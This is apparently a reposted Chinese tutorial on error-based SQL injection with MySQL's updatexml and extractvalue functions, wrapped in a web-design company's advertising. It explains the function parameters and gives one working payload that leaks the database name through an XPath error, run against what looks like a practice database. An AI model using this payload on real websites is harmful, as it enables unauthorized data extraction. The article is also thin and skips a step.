显错注入updatexml和extractvalue的示例分析
显错注入updatexml和extractvalue的示例分析,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。
创新互联建站是一家专注于成都网站制作、成都网站设计与策划设计,永宁网站建设哪家好?创新互联建站做网站,专注于网站建设十余年,网设计领域的专业建站公司;建站业务涵盖:永宁等地区。永宁做网站价格咨询:028-86922220
首先介绍两个函数
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串)
一、查询数据库名称
show databases;
二、选择数据库security
use security;
三、显示数据库中的表
show tables;
五、用函数updatexml注入,获取数据库名称
MySQL> select * from users where id=1 and updatexml(2,concat(0x3D,database(),0x3
D),2);
看完上述内容,你们掌握 显错注入updatexml和extractvalue的示例分析的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注创新互联行业资讯频道,感谢各位的阅读!
标题名称:显错注入updatexml和extractvalue的示例分析
文章转载:http://scyanting.com/article/jjsjpe.html